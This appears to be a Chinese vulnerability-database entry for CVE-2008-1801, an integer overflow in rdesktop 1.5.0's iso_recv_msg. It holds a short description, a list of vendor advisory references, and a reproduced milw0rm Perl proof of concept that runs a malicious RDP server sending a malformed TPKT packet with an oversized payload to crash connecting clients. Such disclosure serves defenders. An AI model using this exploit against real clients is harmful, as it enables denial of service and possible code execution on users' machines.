rdesktop 'iso_recv_msg' 整数溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115159 漏洞类型 数字错误
发布时间 2008-05-08 更新时间 2009-04-08
CVE编号 CVE-2008-1801 CNNVD-ID CNNVD-200805-089
漏洞平台 Linux CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/5561
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200805-089
|漏洞详情
rdesktop1.5.0版本中的iso_recv_msg函数(iso.c)存在整数溢出漏洞。远程攻击者可以借助一个带有短字段的远程桌面协议(RDP)请求,引起拒绝服务攻击(崩溃)以及可能执行任意代码。
|漏洞EXP
#!/usr/bin/perl
#
# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=696

use warnings;
use strict;
use IO::Socket;

my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '3389', Listen => 1, Reuse => 1) || die($!);

while(my $c = $sock->accept())
{
        print $c        "\x03"                          .# TPKT version
                        "\x00"                          .# reserved
                        "\x00\x01"                      .# evil length here 
                        "\x06\xd0\x00\x00\x12\x34\x00"  .
                        "\x41" x 204942;

        sleep 1;
        close $sock;
}

# milw0rm.com [2008-05-08]
|参考资料

来源:XF
名称:rdesktop-isorecvmsg-code-execution(42272)
链接:http://xforce.iss.net/xforce/xfdb/42272
来源:UBUNTU
名称:USN-646-1
链接:http://www.ubuntu.com/usn/usn-646-1
来源:SECTRACK
名称:1019990
链接:http://www.securitytracker.com/id?1019990
来源:REDHAT
名称:RHSA-2008:0725
链接:http://www.redhat.com/support/errata/RHSA-2008-0725.html
来源:REDHAT
名称:RHSA-2008:0576
链接:http://www.redhat.com/support/errata/RHSA-2008-0576.html
来源:REDHAT
名称:RHSA-2008:0575
链接:http://www.redhat.com/support/errata/RHSA-2008-0575.html
来源:MILW0RM
名称:5561
链接:http://www.milw0rm.com/exploits/5561
来源:VUPEN
名称:ADV-2008-2403
链接:http://www.frsirt.com/english/advisories/2008/2403
来源:support.avaya.com
链接:http://support.avaya.com/elmodocs2/security/ASA-2008-360.htm
来源:SUNALERT
名称:240708
链接:http://sunsolve.sun.com/search/document.do?assetkey=1-26-240708-1
来源:SLACKWARE
名称:SSA:2008-148-01
链接:http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.395286
来源:GENTOO
名称:GLSA-200806-04
链接:http://security.gentoo.org/glsa/g